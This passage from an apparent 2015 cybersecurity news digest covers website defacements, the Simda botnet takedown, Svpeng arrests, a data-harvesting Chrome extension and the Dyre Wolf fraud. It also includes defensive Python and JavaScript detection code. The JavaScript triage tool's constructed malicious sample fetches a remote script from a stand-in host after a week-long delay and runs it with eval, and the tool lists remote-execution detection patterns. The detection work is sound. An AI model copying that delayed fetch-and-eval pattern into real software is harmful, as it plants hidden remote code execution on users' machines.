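    for account, attempts in by_account.items():
        attempts.sort()
        for i, (ts, ip, result) in enumerate(attempts):
            if result != "OK":
                continue
            prior_fail_ips = {p_ip for p_ts, p_ip, p_res in attempts[:i]
                              if p_res == "FAIL" and ts - p_ts <= window}
            if len(prior_fail_ips) >= min_sources:
                flagged.add(account)
    return flagged


def analyse(text):
    """Run both detectors over a log and return sorted findings."""
    events = parse_log(text)
    return {
        "spraying_sources": sorted(flag_spraying_sources(events)),
        "likely_takeovers": sorted(flag_distributed_takeovers(events)),
    }


if __name__ == "__main__":
    print(analyse(SAMPLE_LOG))
```

On the constructed log, 198.51.100.7 is flagged because it tried six accounts in six seconds, and frequent42 is flagged because three different addresses failed against it just before a fourth succeeded; grace, who mistyped once from her own address, is not flagged. The second detector is the one that matters for the distributed case the article describes, since each bot may touch an account only once.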

Hackers Attack Belgian Press Group, Second in Days

Hackers attacked one of Belgium’s top newspaper publishers on Sunday just days after Tunisian Islamist militants took control of a regional government portal to denounce US counter-terror operations.
There was no immediate indication the incidents were linked to each other or to a massive cyberattack against French station TV5Monde on Wednesday which Paris said was likely a “terrorist act.”
Didier Hamann, head of the Le Soir newspaper, said the daily had been “the victim of an attack.”
“Nothing concrete to link it with TV5 or RW,” Hamann said in a tweeted message, referring to the French attack and Friday’s takeover of an economic news website run by the Wallonian regional government in southern Belgium.
“We are trying to determine the origin of the attack,” Hamann told Belga news agency separately.
“We are regularly targeted and the attacks are quickly controlled but in this case, the firewalls did not work as normal,” he added.
Le Soir is owned by the Rossel Group which has several other publications.
Its websites were unavailable from 1730 GMT Sunday.
Eric Malrain, chief financial officer with the Rossel Group, told AFP: “There has been a cyberattack at Le Soir but we have no other information for the moment.”
Hamann said Le Soir would appear Monday as usual.
Earlier reports treated the incident as a technical breakdown before it was established it was a hacking attack.
In Friday’s attack on the Wallonian government website, hackers identified as the “Fallaga Team” from Tunisia ran a video followed by a message saying:
“Take your heads out of the sand, struggle against your leaders, join the resistance.”
Press reports said the Fallaga Team had hacked several French institutions shortly after the Islamist attacks in Paris in January which left 17 people dead.
The TV5Monde hackers for their part said French President Francois Hollande had committed “an unforgivable mistake” by joining the US-led air campaign against the extremist Islamic State group in Syria and Iraq, which had led to the January killings in Paris.
Belgium is also part of the US-led operation and in February said it would send around 35 soldiers to Iraq to help train its army in the fight against IS.

Interpol frees 770,000 systems from Simda botnet

Interpol targets the Simda botnet
Interpol has successfully freed 770,000 machines from the Simda botnet during a joint operation with Microsoft, Kaspersky Lab, Trend Micro and Japan's Cyber Defense Institute.
The operation saw Interpol's Digital Crime Centre (IDCC) coordinate with local law enforcement and the tech firms to mount a series of "simultaneous" server takedowns in the US, Russia, Luxembourg and Poland on 9 and 10 April.
The operation has been hailed as a major success in the ongoing battle against cyber crime.
Simda has been used to target everything from general web users to financial institutions for several years.
The attacks granted hackers remote access to victim systems and let them spread malware and steal vast amounts of data, including personally identifiable information and banking passwords.
Kaspersky Lab security expert Vitaly Kamluk said the campaign was particularly dangerous as it had defence-dodging capabilities.
"This bot is mysterious because it rarely appears on our KSN radars despite compromising a large number of hosts every day," he explained in a blog post.
"It has a number of methods to detect research sandbox environments with a view to tricking researchers by consuming all CPU resources or notifying the botnet owner about the external IP address of the research network.
"Another reason is a server-side polymorphism and the limited lifetime of the bots."
The operation began after Microsoft's Digital Crimes Unit spotted and reported a spike in Simda infections.
In January and February Interpol reported that Simda had enslaved 90,000 systems in the US alone.
The IDCC then worked with Microsoft, Kaspersky Lab, Trend Micro and Japan's Cyber Defense Institute to create a "heat map" detailing infection hot zones and the location of the botnet's command and control servers.
Microsoft has since released a Simda clean-up tool that will let users purge their systems of the malware.
IDCC director Sanjay Virmani said the combined operation demonstrated the value of collaboration between the public and private sectors in combating cyber crime.
"This successful operation shows the value and need for partnerships between national and international law enforcement with private industry in the fight against the global threat of cyber crime," said Virmani.
Trend Micro argued that businesses must devise more robust cyber security strategies if they hope to protect themselves from threats like Simda.
"We advise users to be cautious when opening emails. Avoid opening emails and attachments from senders who are unknown or who cannot be verified," explained Trend Micro in a blog post.
"P2P networks aren't inherently malicious but users should be aware that dealing with these sites can increase their chances of encountering malware.
"Users should also invest in a security solution that goes beyond simple malware detection; features such as spam detection and URL blocking can go a long way in protecting users from threats."
The Simda takedown is the latest in a series of anti-botnet operations.
A task force comprising Europol, the Dutch National High Tech Crime Unit and the FBI, with support from Intel, Kaspersky and Shadowserver, reported taking down the Beebone botnet on 9 April.

Russia pulls alleged 'Svpeng' kingpin

Russia's Ministry of the Interior has gone public about the March 24 arrest of a 25-year-old it believes was the leader of a gang of cyber-scum behind the “Svpeng” money-draining malware, along with four others.
The Android malware is believed to have netted a near million-dollar haul within Russia alone (50 million rubles), hitting 350,000 Google devices during 2013 and 2014.
According to Forbes, Svpeng started by acting like a Google Play buy-credit window, opening over the top of the store and requesting credit card details. Later, the group in charge switched tactics to ransomware, popping up a fake FBI “penalty notification” on screens and locking devices until the gang was paid.
Last year, Kaspersky noted the group's decision to start attacking users outside Russia's borders.
According to Google Translate, the ministry's April 11 announcement says the arrests took place in Chelyabinsk during March.
The operatives “seized a significant amount of computer equipment with traces of Internet dissemination of malicious software, mobile phones, SIM cards, electronic media, server hardware,” the statement notes, along with the credit cards that received the stolen funds.
The translation suggests a confession was obtained.

Wednesday, 8 April 2015

Illegal downloading: Australia internet firms must supply data

An Australian court has ordered internet service providers (ISPs) to hand over details of customers accused of illegally downloading a US movie.

In a landmark move, the Federal Court told six firms to divulge names and addresses of those who downloaded The Dallas Buyers Club.

The case was lodged by the US company that owns the rights to the 2013 movie.

The court said the data could only be used to secure "compensation for the infringements" of copyright.

In the case, which was heard in February, the applicants said they had identified 4,726 unique IP addresses from which their film was shared online using BitTorrent, a peer-to-peer file sharing network. They said this had been done without their permission.

Once they received the names of account holders, the company would then have to prove copyright infringement had taken place.

The judgment comes amidst a crackdown by the Australian government on internet piracy.

Australians are among the world's most regular illegal downloaders of digital content. The delay in release dates for new films and TV shows, and higher prices in Australia for digital content, have prompted many Australians to find surreptitious ways to watch new shows.

The ISPs involved in the case, including Australia's second-largest provider iiNet, said releasing customer information would be a breach of privacy and lead to what is known in the US as "speculative invoicing".

This is where account holders are threatened with court cases that could result in large damages unless smaller settlement fees are paid.

The ISPs argued also that the monetary claims which the US company, Dallas Buyers Club LLC, had against each infringer were so small "that it was plain that no such case could or would be maintained by the applicants".

But Justice Nye Perram ruled that the customer information could be released on condition it was only used to recover compensation for copyright infringement.

"I will also impose a condition on the applicants that they are to submit to me a draft of any letter they propose to send to account holders associated with the IP addresses which have been identified," he ruled.

Justice Perram said the ruling was also important for deterring illegal downloading.

"It is not beyond the realm of possibilities that damages of a sufficient size might be awarded under this provision in an appropriately serious case in a bid to deter people from the file-sharing of films," he said.

The case came to court after Dallas Buyers Club LLC contacted iiNet and other ISPs, asking them to divulge customer details without a court order. The ISPs refused.

The ISPs have yet to say if they will appeal against the court ruling.

Professor of Law at the University of Technology, Sydney, Michael Fraser said it was an important judgement for ISPs and customers.

"If this [judgement] is upheld then the days of anonymous pirating may be over," Prof Fraser told ABC TV.

Report: U.S. officials say Russians hacked White House computer system

White House officials believe hackers who gained access to their computer network may be the same ones who broke into the State Department’s system, CNN reported.

The White House has been hacked and investigators think they know how, according to unnamed officials in a CNN report.
In November, hackers are said to have breached the U.S. State Department’s unclassified email system. A month later, “suspicious cyber activity” was noticed on a White House computer network, Reuters said. Now it appears as though these same hackers used the State Department cyber intrusion—which has been ongoing despite the department’s best efforts to block and wipe it—as a beachhead to gain entry into the White House’s computer systems.
White House deputy national security advisor—and Fortune 40 under 40 alum—Ben Rhodes told Wolf Blitzer on “The Situation Room” that the White House has separate networks: one classified, one unclassified. Hackers appear only to have breached the unclassified one, CNN reported. As Rhodes told Blitzer:
Well, Wolf, first of all I’m not going to get into details about our cyber security efforts. What I can say though, Wolf, is, as you said, we were public about the fact that we were dealing with cyber intrusions and the State Department was public about that, but the fact of the matter is that we have different systems here at the White House, so we have an unclassified system and then we have a classified system, a top-secret system. That is where the sensitive national security information is—the classified information is—that was a secure system. So we do not believe that our classified systems were compromised.
I will tell you, Wolf, as a general matter we are constantly updating our security precautions on our unclassified systems. But frankly, we’re also told to act as if we need to not put information that is sensitive on that system. So, in other words, if you’re going to do something that’s classified you have to do it on one email system, on one phone system, and frankly you have to act as if information could be compromised if it’s not on the classified system.
According to CNN, unnamed White House officials blamed the White House breach on Russian hackers. “One official says the Russian hackers have ‘owned’ the State Department system for months and it is not clear the hackers have been fully eradicated from the system,” CNN reported. After assessing the malware used by the attackers and their methods, the officials seem to believe that the White House breach is in some way linked to Moscow.
In the fall, U.S. director of national intelligence James Clapper told an audience at the University of Texas in Austin that Russia posed a bigger cyber threat than China.
The intrusion likely resulted, as many cyber breaches do, from an employee clicking on a malicious link or attachment in a so-called phishing email. That’s how investigators believe the hackers accessed the State Department’s systems, according to the Wall Street Journal. It’s also how they believe the hackers infiltrated the White House systems—this time, under the guise of a hijacked State Department email account, CNN said.
Though the White House has downplayed the severity of its breach since the fall, CNN noted that the hackers would have gained access to President Barack Obama’s private itinerary—an undeniably irresistible target for foreign spies.

Data possibly exposed for more than 364K Auburn University students

Auburn University is notifying more than 364,000 current, former and prospective students – as well as applicants who never enrolled in or attended the university – that their personal information was inadvertently accessible via the internet.

How many victims? 364,012.

What type of personal information? The information varied depending on the individual, but included names, addresses, dates of birth, Social Security numbers, email addresses and academic information.

What happened? The personal information of current, former and prospective Auburn University students – as well as applicants who never enrolled in or attended the university – was inadvertently accessible via the internet.

What was the response? Auburn University secured its system and launched an investigation, which is ongoing. The university is conducting a review of its data storage practices and policies. All potentially impacted individuals are being notified, and offered two free years of credit monitoring and identity protection services, as well as lifetime access to fraud resolution services.

Details: Auburn University became aware of the issue on March 2. The information was accessible via the internet between September 2014 and March 2. Auburn University is unaware of any attempted or actual misuse of any personal information as a result of the incident.

Quote: “The exposure resulted from configuration issues with a new device installed to replace a broken server,” according to a notification posted to the Auburn University website.

Source: “Data Security Incident Information,” April 3, 2015; “Frequently Asked Questions,” April 3, 2015.

Hackers leak messages between the Kremlin and France’s far-right National Front

French media site Mediapart has reported that hackers have leaked thousands of texts and emails sent between the Kremlin and the French far-right party, the National Front.
According to French newspaper Le Monde, the hackers posted the messages on their website and many of the texts discuss Marine Le Pen, the leader of the National Front, and her support for the annexation of the Crimean peninsula, which occurred in March 2014.
The exchanges are between ‘Timur Prokopenko,’ who the hackers identify as a Kremlin official and Kostya, a man they describe as a “Russian connection” who has access to Le Pen.
The men discuss finding out if Le Pen will back Russia in Crimea by becoming “an observer” of the annexation. According to Le Monde, one message from Prokopenko reads “We really need her, I said to the boss you could arrange this with her”, in reference to Le Pen’s support of the internationally unrecognised referendum held before Russia annexed Crimea. Kostya then gives assurances that the National Front “will officially take a position on the Crimea".
The head of the National Front’s list in Ile-de-France constituency, Aymeric Chauprade, was an observer at the Crimea referendum last March, although the party denied allegations that he had attended as the foreign policy advisor. Speaking of his decision to attend, Chauprade told Russian News Channel RT: “I think the referendum is legitimate. We are talking about long-term history. We are talking about the Russian people, about the territories of the former USSR.”
In February this year, Le Pen gave an interview to the Polish weekly Do Rzeczy in which she said that France should recognise Crimea as part of Russia.
In December she revealed that her party had received a €9m loan from Russian-owned First Czech-Russian Bank, leading to reports that Putin was purposefully bankrolling radical European parties in order to destabilise Europe. However, Le Pen argued that French banks had turned down the National Front for a loan and so they had accepted one from Russia instead.
Le Pen visited Moscow several times last year and met with deputy prime minister Dmitry Rogozin and other Kremlin officials to discuss policy issues.

Islamist hackers seize control of Defra's air-quality website

Group calling itself Moroccan Islamic Union-Mail posts picture of Saddam Hussein and criticises Britain for its role in invasion of Iraq
Defra’s hacked air-quality website early on Tuesday morning. Photograph: Jim McQuaid/Twitter
Islamist hackers seized control of the government’s official air-quality website to post a message criticising Britain for its role in the invasion of Iraq in 2003.
Visitors on Tuesday morning to the UK-Air website, part of the Department for Food, the Environment and Rural Affairs, were greeted with a black background and a large portrait of the former Iraqi dictator Saddam Hussein.
Beneath it a message in broken English read: “It’s time to remind the British government what you did with Saddam Hussein will not forget. And we are ready to sacrifice with everything, as not to give up Iraq and stay alert for the coming…”
Twitter users noticed the hack, claimed by a group calling itself the Moroccan Islamic Union-Mail, as early as 7am. By 8am the message had been removed and replaced with a holding page. Moroccan Islamic Union-Mail appears to style itself as an Islamist version of the Anonymous hacking group.
A Defra press officer told the Guardian that the department was “aware” of the hack but could provide no further details at that time.
The hacked page included a link to an Arabic-language Facebook page for the Moroccan Islamic Union-Mail. A banner picture on the page showed eight masked men posing in T-shirts bearing the acronym MIUM. A link on the page led to a webpage hosting an Anonymous-style montage video made of news reports on the hackers’ exploits.
On the news feed, the group claimed responsibility for a separate hack of Zambia’s state website, as well as posting anti-Israel messages and comments on Middle East politics.
The Anti-Defamation League, which documents and counters racism, has previously accused MIUM of hacking on behalf of the Islamic State terrorist group. MIUM hackers have targeted Jewish websites in the US during the recent conflict between Israel and Gaza, the ADL said in a blogpost, before turning their attention to US military-linked websites in response to the American-led air campaign against Isis which began in December.
British forces are also involved in the campaign against Isis militants in Iraq. The backbone of the terror group is formed of Sunni Islamists, but elements of Saddam’s Baathist regime – which was backed by Iraq’s Sunni minority – are also said to support the insurgency.
The UK was part of the US-led coalition that invaded Iraq in 2003, toppling Saddam after nearly 24 years in power. The UK’s role in the Iraq war has previously been cited as a justification for terrorist attacks and threats against British nationals.
Mention of the Defra hack was first made on Twitter by Jim McQuaid at 7.05am. The UK-Air home page usually publishes pollution forecasts for the coming days and data on the latest pollution levels. Normal service had been restored to the UK-Air site by 8.24am.

FBI to WordPress users: patch now before ISIL defaces you

The United States Federal Bureau of Investigation (FBI) has issued a warning to WordPress users: hurry up and patch your content management system before your website is defaced by ISIL sympathisers.
The Bureau has issued a notice titled "ISIL defacements exploiting WordPress vulnerabilities" in which it warns that "Continuous Web site defacements are being perpetrated by individuals sympathetic to the Islamic State in the Levant (ISIL) a.k.a. Islamic State of Iraq and al-Shams (ISIS)."
"The defacements have affected Web site operations and the communication platforms of news organizations, commercial entities, religious institutions, federal/state/local governments, foreign governments, and a variety of other domestic and international Web sites," the notice says. "Although the defacements demonstrate low-level hacking sophistication, they are disruptive and often costly in terms of lost business revenue and expenditures on technical services to repair infected computer systems."
The good news is that the Bureau thinks the perps are not ISIL members, but sympathisers. It nonetheless advises WordPress users to get their heads around security and patch plugins ASAP.
It's sound advice: Sucuri researcher Alexandre Montpas is warning of a persistent cross-site scripting vulnerability in the WordPress Super Cache plugin that allows up to a million sites to be hijacked.
Montpas reveals the bug affecting versions below 1.4.3 which have been downloaded more than a million times according to WordPress statistics.
Montpas says attackers could have malcode executed if administrators peered into the plugin's listing page.
"Using this vulnerability, an attacker using a carefully crafted query could insert malicious scripts to the plugin’s cached file listing page," Montpas says.
"As this page requires a valid nonce in order to be displayed, a successful exploitation would require the site’s administrator to have a look at that particular section, manually.
"When executed, the injected scripts could be used to perform a lot of other things like adding a new administrator account to the site, and injecting backdoors by using WordPress theme edition tools."
The since-patched bug resides in the display of data from WP Super Cache's cache file key, the value that selects which cache file is loaded.
It is the latest in a laundry list of WordPress plugin vulnerabilities to be disclosed recently.
The problem with un-patched plugins, as distinct from the WordPress platform itself,
WordPress hacking is a favourite pastime of lazy hackers and exploit-kit slingers who seek to achieve maximum carnage for minimum effort.

Google Ads go NUCLEAR, foist exploit kit

Security bod Maarten van Dantzig says a large number of Google ads sold through Bulgarian reseller EngageLab have been pointing users to the dangerous Nuclear exploit kit.
The Fox-IT binary basher found the campaign, which may at the time of writing have been subject to the Choc Factory's boot, could result in a "very large" number of attacks.
Victims could be compromised over Adobe Flash, Java, and Microsoft's lonely orphan Silverlight.
Nuclear exploit kit redirection was first observed overnight targeting Fox-IT customers, van Dantzig says.
"The Fox-IT SOC (security operations centre) has detected a relatively large amount of infections and infection attempts from this exploit kit among our customers [and] we suspect that this malvertising campaign will be of a very large scale," van Dantzig says.
"Though we have not received any official confirmation, we are currently no longer observing malicious redirects from the advertisement reseller."
Van Dantzig reported the command and control server and three others foisting the exploit kit to Google.
He recommends users block access to '', deploy an advertisement blocker and update (or uninstall) Flash, Java, or Silverlight. ®

A MILLION Chrome users' data was sent to ONE dodgy IP address

A team of security researchers have found malware in a popular Chrome extension which may have sent the browsing data of over 1.2m users to a single IP address.
ScrapeSentry credits its researchers with uncovering "a sinister side-effect to a free app [...] which potentially leaks [users'] personal information back to a single IP address in the USA".
Martin Zetterlund, one of ScrapeSentry's founders, told The Register that the extension's malicious functions would have been difficult to recognise through an automated auditing service because the sneaky developer had ensured this functionality was not downloaded until seven days after installation.
ScrapeSentry analysed the dodgy Chrome extension last week and submitted its findings to Google.
The offending malware, Webpage Screenshot, was removed from the Chrome Extension web store on Tuesday. The extension apparently allowed users to capture screenshots and save them for later editing.
In a canned statement Zetterlund said: "We recently identified an unusual pattern of traffic to one of our client’s sites which alerted our investigators that something was very wrong."
He added: "Everything downloaded from the internet needs to be treated with suspicion, it's a good idea to look what others have to say about programs and extensions first if you don't have the knowledge to pick them apart yourself."
Cristian Mariolini, the ScrapeSentry analyst who headed up the team that found the rogue extension, noted: "The repercussions of this could be major for the individuals who have downloaded the extension. What happens to the personal data and the motives for wanting it sent to the US server is anyone's guess, but ScrapeSentry would take an educated guess it's not going to be good news."
"And of course, if it’s not stopped, the plug-in may, at any given time, be updated with new malicious functionality as well. We would hope Google will look into this security breach with some urgency," he added.
A spokesman for Webpage Screenshot told the BBC there was nothing malicious about the data it gathered. Instead, said the company man, it was used to understand who the extension's users were and where they were located, to help drive development of the code.
Users could opt out of sharing data, he said.
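The detail that matters for anyone auditing extensions is the seven-day delay: a payload that is only fetched and executed long after installation never shows up in a review that installs the extension and watches it for an hour. The following is an added example, not ScrapeSentry's analysis code and not the Webpage Screenshot extension, of a static triage pass that flags the three things that pattern needs: broad permissions, code that executes strings or pulls scripts from the network, and timers or alarms armed for a day or more. The two sample extensions (manifest plus background script) and the heuristics themselves are constructed for illustration, and a clean report is not proof of safety.

```javascript
// Added example (not ScrapeSentry's or the extension's code): static triage of
// a Chrome extension for the pattern described above, where the malicious
// functionality is fetched from a remote host only days after installation.
// The manifest, scripts and heuristics are constructed for illustration.
const DAY_MINUTES = 24 * 60;

// Permissions that let an extension read or rewrite every page the user visits.
const BROAD_PERMISSIONS = new Set([
  '<all_urls>', 'tabs', 'webRequest', 'webRequestBlocking', 'history', 'cookies',
]);

// Source patterns that execute strings or pull code from the network.
const REMOTE_EXEC_PATTERNS = [
  { id: 'eval', re: /\beval\s*\(/g },
  { id: 'new-function', re: /\bnew\s+Function\s*\(/g },
  { id: 'script-tag', re: /createElement\s*\(\s*['"]script['"]\s*\)/g },
  { id: 'remote-fetch', re: /\b(?:fetch|importScripts|XMLHttpRequest)\b[^;\n]*https?:\/\//g },
];

// Evaluates a delay literal such as "7 * 24 * 60 * 60 * 1000" without eval().
function literalValue(expr) {
  if (!/^[\d\s*+]+$/.test(expr) || !/\d/.test(expr)) return NaN;
  return expr.split('+')
    .map((term) => term.split('*').reduce((acc, n) => acc * Number(n), 1))
    .reduce((acc, n) => acc + n, 0);
}

// Timers and alarms that fire a day or more after they are armed: the shape of
// a payload deliberately held back past the window an automated audit sees.
function longDelays(source) {
  const hits = [];
  for (const m of source.matchAll(/\bsetTimeout\s*\([\s\S]*?,\s*([\d\s*+]+)\)/g)) {
    const minutes = literalValue(m[1]) / 60000; // setTimeout takes milliseconds
    if (minutes >= DAY_MINUTES) hits.push({ api: 'setTimeout', minutes });
  }
  for (const m of source.matchAll(/(?:delayInMinutes|periodInMinutes)\s*:\s*([\d\s*+]+)/g)) {
    const minutes = literalValue(m[1]); // chrome.alarms takes minutes
    if (minutes >= DAY_MINUTES) hits.push({ api: 'chrome.alarms', minutes });
  }
  return hits;
}

// Returns one finding per broad permission, remote-code pattern or long delay.
function triageExtension(manifest, scripts) {
  const findings = [];
  for (const p of manifest.permissions || []) {
    if (BROAD_PERMISSIONS.has(p)) findings.push({ check: 'broad-permission', detail: p });
  }
  for (const [file, source] of Object.entries(scripts)) {
    for (const { id, re } of REMOTE_EXEC_PATTERNS) {
      for (const m of source.matchAll(re)) {
        findings.push({ check: id, detail: `${file}: ${m[0].trim()}` });
      }
    }
    for (const d of longDelays(source)) {
      const days = (d.minutes / DAY_MINUTES).toFixed(1);
      findings.push({ check: 'long-delay', detail: `${file}: ${d.api} fires after ${days} days` });
    }
  }
  return findings;
}

// Constructed sample: a screenshot extension whose background script arms a
// week-long timer, then fetches and evaluates code from a remote host.
const SUSPECT = {
  manifest: { name: 'Webpage Screenshot (sample)', permissions: ['<all_urls>', 'tabs', 'storage'] },
  scripts: {
    'background.js': `
      chrome.runtime.onInstalled.addListener(() => {
        setTimeout(() => {
          fetch('https://example.invalid/update.js')
            .then((r) => r.text())
            .then((code) => eval(code));
        }, 7 * 24 * 60 * 60 * 1000);
      });`,
  },
};

// Constructed sample: the same feature done locally with the minimum permissions.
const BENIGN = {
  manifest: { name: 'Screenshot (sample)', permissions: ['activeTab', 'downloads'] },
  scripts: {
    'background.js': `
      chrome.action.onClicked.addListener((tab) => {
        chrome.tabs.captureVisibleTab(tab.windowId, { format: 'png' }, (url) => {
          chrome.downloads.download({ url, filename: 'shot.png' });
        });
      });`,
  },
};

console.log(triageExtension(SUSPECT.manifest, SUSPECT.scripts));
console.log(triageExtension(BENIGN.manifest, BENIGN.scripts)); // []
```

Run it with `node triage.js` against the unpacked extension's manifest and scripts. The delay check only understands numeric literals and simple products; a delay computed from `Date.now()` or read from storage is reported as nothing, which is exactly why a flagged `fetch` of a remote script is the stronger signal: code the store reviewer cannot see at submission time can change at any moment, the point Mariolini makes above.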

Tuesday, 7 April 2015

Huffington Post: Don't Be the Weakest Link in Your Company's Cyber Security Plan

The other night, after falling asleep and waking up the next morning, I realized I didn't lock the front door to my home. I have locks on the doors, the windows, an alarm system, hurricane shatterproof windows, and two small dogs with a high-pitched bark that could wake the dead; but all that protection won't do me any good if I forget to lock the front door.

I work for a company that has about 20,000 employees. I own a company that has 18. No matter how big or small your company is, we all have something to protect. No matter how many layers of security we have in place, people continue to be the weakest link in their company's cyber security plan.

Let's go back to the front door analogy for a moment. Even though I have all those layers of security to protect my home, if I don't lock the front door then it's all meaningless and I increase the risk to my family -- what I'm trying to protect. The same holds true for us in business every day, only the front door isn't always physical; it is digital too. Our computers, smartphones and tablets lead directly to our company's front door, providing access to anyone who can get in.

Here's a better way of looking at it.

The company we work for stores our personal information -- social security numbers, first names, last names, phone numbers, and addresses. We should have a strong interest in protecting that information, because if we don't it could mean the loss or theft of our identities. What about our company's confidential information? We want to protect that too, because if we don't, it could mean regulatory compliance fines and reputational damage which could seriously impact our company's bottom line. Some people may lose their jobs if our company can't afford to pay us.

Now, I know what you're thinking: "Isn't that why we have a cyber security team?" Yes, but remember our "front door" analogy? We are at the front door every day, that digital front door. When we power up our computers in the morning and open our e-mail, sometimes there's a link or an attachment just waiting to be clicked or opened, and that link or attachment, whether we realize it or not, is laden with malicious software (a virus or backdoor) that will leave the front door open to our business. So even though we have a security team in place to protect us, if we click that malicious link or attachment, their hard work and the money they invested to keep the company safe may not prevent the bad guys from getting in.

So, are you that person? Are you the one who will leave the digital front door to your company unlocked today? Are you the weakest link in your company's cyber security plan? No matter how many firewalls and layers of computer protection your company invests in, if we don't remember to slow down and check the locks on our doors, we could put ourselves and our company at great risk. We all have a role to play to help keep our companies safe.

Be careful what you click. Don't be enticed by tempting messages to watch a funny video or see a nude celebrity. And try to be aware of new social, political, and environmental issues, since many hackers use those types of events to entice you into opening that front door. Slow down. Read carefully. Who is the sender? Were you expecting this message or phone call (yes, be on the lookout for suspicious phone calls too)? If you are unsure then stop what you are doing and ask a security-minded professional what they think. If you develop these kinds of behaviors then you won't be the weakest link in your company's cyber security plan. You will have kept the digital front door locked, and your personal and company information safe and secure.

A Herald-State College of Florida public forum on cyber security, identity theft

Last week President Obama put a bright spotlight on devilish issues that jeopardize all Americans: cyber security and identity theft.
Data breaches are all too commonplace today, with personal information and industrial secrets a gold mine for hackers operating for either profit or country.
The global threat is so pervasive and steady, nobody is immune. Last year, FBI Director James Comey told CBS' "60 Minutes" this: "There are two kinds of big companies in the United States. There are those who've been hacked ... and those who don't know they've been hacked ..."
While he was talking specifically about the Chinese, hackers around the world are at work.
Which is why Obama issued an executive order Wednesday empowering the Treasury Department to freeze the financial assets of Internet attackers who threaten our national and economic security.
The order, which declares a national emergency over these online threats, covers the theft of trade secrets and personal information.
The issue is particularly hot now with income tax season coming to a close, and some filers finding their identities compromised as thieves steal their returns.
To put this into focus, the Herald and State College of Florida Manatee-Sarasota are holding our next Community Conversation on this issue -- on April 29.
This public forum offers you the opportunity to engage experts in information technology and security and learn about Internet vulnerability and risk awareness.
Presented by the Herald and SCF in partnership with Manatee Educational Television, we invite the public to not only attend, but to send us your questions and concerns about this vital issue ahead of the forum. We'll address as many of your questions as possible during the forum.
In order to keep the conversation moving along, there will not be an open mike for public comments and questions during the forum.
Please submit those in advance of the event to or send regular mail to Editorial Page Editor Chris Wille, 1111 Third Ave. W., Bradenton 34205. And please include your name.
The free forum will be held from 6-7:30 p.m. April 29 at SCF's Howard Studio Theater, located on the college's Bradenton campus in Building 11 West, off 60th Avenue West between 26th and 34th streets, accessed from Parking Lot I. Details can be found at
The forum will be broadcast by METV at later dates.
The pervasive and insidious problem of data breaches is best illustrated by these figures:
• 80 million customers of the country's second largest health insurance company, Anthem, had their birthdays, Social Security numbers and employment information taken by cyber attackers, the firm announced in February.
• In December 2013 Target discovered individual contact information on 110 million customer accounts -- credit and debit details -- had been stolen.
• In September 2014, Home Depot reported credit card information of about 56 million shoppers was compromised.
State College of Florida is revamping its associate in science degree in Network Systems Technology this coming fall. That will include a Cybersecurity and Digital Forensics specialization, patterned after the National Security Agency's Center of Academic Excellence guidelines.
As the college notes, demand for cybersecurity professionals has grown 12 times faster than non-IT jobs, and 3.5 times faster than the demand for other IT jobs in recent years.


The White House's New Executive Order On Cyber Crime is (Unfortunately) No Joke

On the morning of April 1st, the White House issued a new executive order (EO) that asserts that malicious "cyber-enabled activities" are a national threat, declares a national emergency, and establishes sanctions and other consequences for individuals and entities. While computer and information security is certainly very important, this EO could dangerously backfire and chill the very security research that is necessary to protect people from malicious attacks.
We wish we could say it was a very well-orchestrated April Fool's joke, but it appears the White House was serious. The order is yet another example of a bad response to very real security concerns. It comes at the same time as Congress is considering the White House's proposal for fundamentally flawed cybersecurity legislation.
That perhaps shouldn’t be surprising, since so far, D.C.’s approach to cybersecurity hasn’t encouraged better security through a better understanding of the threats we face (something security experts internationally have pointed out is necessary). Instead of encouraging critical security research into vulnerabilities, or creating a better way to disclose vulnerabilities, this order could actually discourage that research.
The most pernicious provision, Section 1(ii)(B), allows the Secretary of the Treasury, "in consultation with" the Attorney General and Secretary of State, to make a determination that a person or entity has "materially ... provided ... technological support for, or goods or services in support of any" of these malicious attacks.
While that may sound good on its face, the fact is that the order is dangerously overbroad. That's because tools that can be used for malicious attacks are also vital for defense. For example, penetration testing is the process of attempting to gain access to computer systems the way an attacker would, often without being issued credentials such as a username. It's a vital step in finding system vulnerabilities and fixing them before malicious attackers do. Security researchers often publish tools, and provide support for them, to help with this testing. Could the EO be used to issue sanctions against security researchers who make and distribute these tools? On its face, the answer is...maybe.
To be sure, President Obama has said that “this executive order [does not] target the legitimate cybersecurity research community or professionals who help companies improve their cybersecurity.” But assurances like this are not enough. Essentially, with these words, Obama asks us to trust the Executive, without substantial oversight, to be able to make decisions about the property and rights of people who may not have much recourse once that decision has been made, and who may well not get prior notice before the hammer comes down. Unfortunately, the Department of Justice has used anti-hacking laws far too aggressively to gain that trust.
As several security researchers who spoke up against similarly problematic terms in the Computer Fraud and Abuse Act recently pointed out in an amicus brief:
There are relatively few sources of pressure to fix design defects, whether they be in wiring, websites, or cars. The government is not set up to test every possible product or website for defects before its release, nor should it be; in addition, those defects in electronic systems that might be uncovered by the government (for instance, during an unrelated investigation) are often not released, due to internal policies. Findings by industry groups are often kept quiet, under the assumption that such defects will never come to light—just as in Grimshaw (the Ford Pinto case). The part of society that consistently serves the public interest by finding and publicizing defects that will harm consumers is the external consumer safety research community, whether those defects be in consumer products or consumer websites.
It’s clear that security researchers play an essential function. It was researchers (not the government) who discovered and conscientiously spread the news about Heartbleed, Shellshock, and POODLE, three major vulnerabilities discovered in 2014. Those researchers should not have to question whether or not they will be subject to sanctions.
To make matters worse, while most of the provisions specify that they apply to activity taking place outside of or mostly outside of the US, Section 1(ii)(B) has no such limitation. We have concerns about how the order applies to everyone. But this section also brings up constitutional due process concerns. That is, if it were to apply to people protected by the U.S. Constitution, it could violate the Fifth Amendment right to due process.
As we’ve had to point out repeatedly in the discussions about reforming the Computer Fraud and Abuse Act, unclear laws, prosecutorial (or in this case, Executive Branch) discretion, coupled with draconian penalties are not the answer to computer crime.

Dyre Wolf malware steals more than $1 million, bypasses 2FA protection

Researchers said they've uncovered an active campaign that has already stolen more than $1 million using a combination of malware and social engineering.
The Dyre Wolf campaign, as it has been dubbed by IBM Security researchers, targets businesses that use wire transfers to move large sums of money, even when the transactions are protected with two-factor authentication. The heist starts with mass e-mailings that attempt to trick people into installing Dyre, a strain of malware that came to light last year. The Dyre versions observed by IBM researchers remained undetected by the majority of antivirus products.
Infected machines then send out mass e-mails to other people in the victim's address book. Then the malware lies in wait. A blog post published Thursday by IBM Security Intelligence researchers John Kuhn and Lance Mueller explains the rest:
Once the infected victim tries to log in to one of the hundreds of bank websites for which Dyre is programmed to monitor, a new screen will appear instead of the corporate banking site. The page will explain the site is experiencing issues and that the victim should call the number provided to get help logging in.
